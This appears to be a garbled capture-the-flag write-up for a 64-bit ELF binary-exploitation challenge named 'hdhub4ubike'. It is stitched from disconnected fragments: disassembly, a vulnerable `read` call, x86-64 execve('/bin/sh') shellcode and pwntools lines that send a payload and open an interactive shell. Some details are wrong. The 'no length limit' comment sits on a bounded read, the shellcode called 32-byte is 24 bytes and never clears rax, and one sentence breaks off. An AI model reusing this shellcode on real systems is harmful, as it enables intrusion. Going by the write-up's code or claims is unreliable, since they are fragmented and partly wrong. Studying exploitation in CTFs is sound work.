Hdhub4ubike -

Challenge name: hdhub4ubike CTF: 2023 – BicycleCTF (the “Bike‑Hub” event) Category: Pwn / Binary Exploitation Points: 400 (medium) Author: unknown 1️⃣ Challenge Overview The provided artifact is a 64‑bit ELF executable named hdhub4ubike . When executed it prints a short banner and then prompts the user for a “bike‑hub key”. If the key is correct, the program prints the flag; otherwise it terminates with “Invalid key!” .

if __name__ == "__main__": main() Running the script prints the flag instantly:

0x0040119f: lea rdi, [rip+0x2000] ; address of the flag string 0x004011a6: call puts@plt 0x004011a6 is the (the call instruction itself). If we return to this address after the overflow, the program will execute the puts call with the correct argument already loaded (the lea instruction that loads the flag pointer into rdi is right before it).

// vulnerable read – no length limit! read(0, buf, 0x100); // <‑‑ overflow possible

# 32‑byte execve("/bin/sh") shellcode (x86‑64) shellcode = ( b"\x48\x31\xd2" # xor rdx, rdx b"\x48\x31\xf6" # xor rsi, rsi b"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00" # movabs rdi, "/bin/sh" b"\x57" # push rdi b"\x48\x89\xe7" # mov rdi, rsp b"\xb0\x3b" # mov al, 0x3b b"\x0f\x05" # syscall )

p.sendline(payload.decode('latin-1')) # send as a line p.interact() # hand over the terminal